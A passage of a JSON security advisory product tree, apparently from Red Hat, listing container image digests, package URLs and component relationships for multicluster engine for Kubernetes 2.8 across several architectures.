"purl": "pkg:oci/console-mce-rhel9@sha256%3A4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775116156"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"product_id": "registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"product_identification_helper": {
"purl": "pkg:oci/discovery-rhel9@sha256%3A4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913711"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hive-rhel9@sha256%3A6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775259683"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-addon-rhel9-operator@sha256%3A55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913832"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-cli-rhel9@sha256%3Ad57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913767"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"product_id": "registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/hypershift-rhel9-operator@sha256%3A17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913854"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"product_id": "registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/image-based-install-rhel9@sha256%3A9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774986989"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"product_id": "registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-mce-rhel9@sha256%3Adad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1774913844"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"product_id": "registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/managed-serviceaccount-rhel9@sha256%3A4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441911"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"product_id": "registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"product_identification_helper": {
"purl": "pkg:oci/managedcluster-import-controller-rhel9@sha256%3A132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775198475"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"product_id": "registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-manager-rhel9@sha256%3A1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775441898"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"product_id": "registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"product_identification_helper": {
"purl": "pkg:oci/placement-rhel9@sha256%3A18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638675"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"product_id": "registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"product_identification_helper": {
"purl": "pkg:oci/provider-credential-controller-rhel9@sha256%3A659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775231857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"product_id": "registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/registration-rhel9@sha256%3Ad6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"product_id": "registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/registration-operator-rhel9@sha256%3Ae7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638748"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x",
"product": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x",
"product_id": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x",
"product_identification_helper": {
"purl": "pkg:oci/work-rhel9@sha256%3Ade69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005?arch=s390x\u0026repository_url=registry.redhat.io/multicluster-engine\u0026tag=1775638726"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64 as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x as a component of multicluster engine for Kubernetes 2.8",
